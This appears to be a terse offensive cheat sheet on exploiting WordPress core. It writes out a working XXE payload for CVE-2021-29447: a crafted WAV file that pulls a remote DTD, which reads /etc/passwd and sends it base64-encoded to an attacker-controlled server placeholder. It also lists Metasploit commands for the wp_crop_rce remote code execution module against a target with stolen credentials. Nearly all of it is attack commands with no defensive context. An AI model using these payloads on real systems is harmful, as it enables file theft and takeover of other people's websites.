WordPress Core Exploitation

WordPress core still has many vulnerabilities over the years.

wordpresscve202129447

$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/xxx.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
$ cat xxx.dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
$ php -S 0.0.0.0:PORT

blog

msf6> use exploit/multi/http/wp_crop_rce
msf6> set LHOST tun0
msf6> set RHOST example.com
msf6> set USERNAME xxx
msf6> set PASSWORD xxx